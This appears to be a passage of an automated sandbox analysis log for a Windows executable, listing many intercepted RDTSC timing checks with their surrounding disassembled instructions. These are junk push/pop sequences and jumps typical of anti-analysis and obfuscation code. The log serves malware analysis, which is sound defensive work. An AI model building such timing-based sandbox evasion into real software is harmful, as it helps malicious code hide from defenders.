Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437B13 second address: 1437B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437B17 second address: 1437B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437D97 second address: 1437D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437D9D second address: 1437DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437EDE second address: 1437EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FA94CE91930h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1437EF5 second address: 1437EFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1438459 second address: 143845D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143845D second address: 143846C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE93526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143846C second address: 1438472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143B350 second address: 143B354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143B354 second address: 143B388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a jp 00007FA94CE9192Ah 0x00000010 jnl 00007FA94CE91938h 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FA94CE91926h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143B388 second address: 143B3A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE93526h 0x00000008 jmp 00007FA94CE93531h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143B504 second address: 143B51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA94CE9192Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 143B6FC second address: 143B700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14412B6 second address: 14412C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144140C second address: 1441410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144168F second address: 14416BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FA94CE91944h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1447170 second address: 1447174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1445B03 second address: 1445B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1445F1B second address: 1445F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ch 0x00000007 jns 00007FA94CE93526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FA94CE93526h 0x00000017 jo 00007FA94CE93526h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14460E5 second address: 14460E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14460E9 second address: 1446110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FA94CE93526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FA94CE93537h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1446110 second address: 1446114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144623A second address: 1446266 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE93532h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA94CE93536h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ECBE2 second address: 13ECBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ECCAF second address: 13ECCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA94CE9352Ch 0x0000000b popad 0x0000000c nop 0x0000000d add ecx, dword ptr [ebp+122D298Fh] 0x00000013 push 00000004h 0x00000015 mov dl, 1Bh 0x00000017 nop 0x00000018 js 00007FA94CE93538h 0x0000001e push eax 0x0000001f push edx 0x00000020 jnc 00007FA94CE93526h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ECCDB second address: 13ECCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ECCDF second address: 13ECD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA94CE93539h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144B701 second address: 144B705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144B83B second address: 144B84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA94CE93526h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144B84A second address: 144B854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA94CE91926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BAE0 second address: 144BB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jp 00007FA94CE9352Eh 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007FA94CE93526h 0x00000017 push ebx 0x00000018 jmp 00007FA94CE93534h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BB0E second address: 144BB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BB17 second address: 144BB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BB1B second address: 144BB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BC48 second address: 144BC78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA94CE93536h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA94CE93534h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BDD3 second address: 144BDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 144BDD7 second address: 144BDE3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE93526h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14534C7 second address: 14534CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14534CF second address: 14534D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA94CE93526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1453C6F second address: 1453C90 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA94CE91926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA94CE91935h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1453C90 second address: 1453CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ch 0x00000007 jno 00007FA94CE93539h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007FA94CE93528h 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1453CC5 second address: 1453CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145424C second address: 145425F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jo 00007FA94CE93528h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145425F second address: 1454263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454263 second address: 1454267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454A7B second address: 1454A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454A81 second address: 1454A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454A8A second address: 1454A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454DB6 second address: 1454DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FA94CE93526h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454DC7 second address: 1454DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454DDF second address: 1454E07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA94CE9352Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA94CE93536h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1454E07 second address: 1454E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145EEDB second address: 145EF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA94CE93539h 0x0000000c jmp 00007FA94CE93537h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E606 second address: 145E610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA94CE91926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E610 second address: 145E614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E614 second address: 145E61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E754 second address: 145E763 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA94CE93526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E763 second address: 145E770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FA94CE9192Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145E770 second address: 145E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145EA81 second address: 145EA9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE91926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA94CE9192Bh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 145EA9C second address: 145EAA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13B569F second address: 13B56CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FA94CE91936h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007FA94CE91938h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA94CE9192Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1465762 second address: 1465779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE93533h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1465A44 second address: 1465A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1465CB9 second address: 1465CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1466276 second address: 14662A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE91939h 0x00000009 pop ecx 0x0000000a ja 00007FA94CE9192Ch 0x00000010 jl 00007FA94CE91926h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14651F4 second address: 1465205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA94CE93526h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1465205 second address: 1465209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1465209 second address: 1465239 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA94CE93526h 0x00000008 jmp 00007FA94CE93539h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jnc 00007FA94CE93526h 0x00000016 pop ecx 0x00000017 popad 0x00000018 push ecx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D728 second address: 146D72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D72E second address: 146D738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D738 second address: 146D75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA94CE91938h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D75C second address: 146D789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FA94CE93539h 0x0000000b jmp 00007FA94CE9352Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D789 second address: 146D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D794 second address: 146D79E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA94CE93526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D3F0 second address: 146D3F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 146D3F8 second address: 146D3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147AB83 second address: 147AB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9192Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147A602 second address: 147A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147A759 second address: 147A75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147C170 second address: 147C174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147C174 second address: 147C18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FA94CE91932h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147C18E second address: 147C19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FA94CE93526h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147F66E second address: 147F672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147F389 second address: 147F38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147F38D second address: 147F3AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FA94CE91931h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA94CE9192Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147F3AE second address: 147F3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FA94CE9352Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 147F3C3 second address: 147F3C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1495476 second address: 1495486 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA94CE93526h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1495486 second address: 149548A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 149548A second address: 14954B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ch 0x00000007 jns 00007FA94CE93526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007FA94CE93530h 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14954B9 second address: 14954C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14954C3 second address: 14954C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14958FA second address: 149591F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE9192Bh 0x00000009 jmp 00007FA94CE91936h 0x0000000e rdtsc
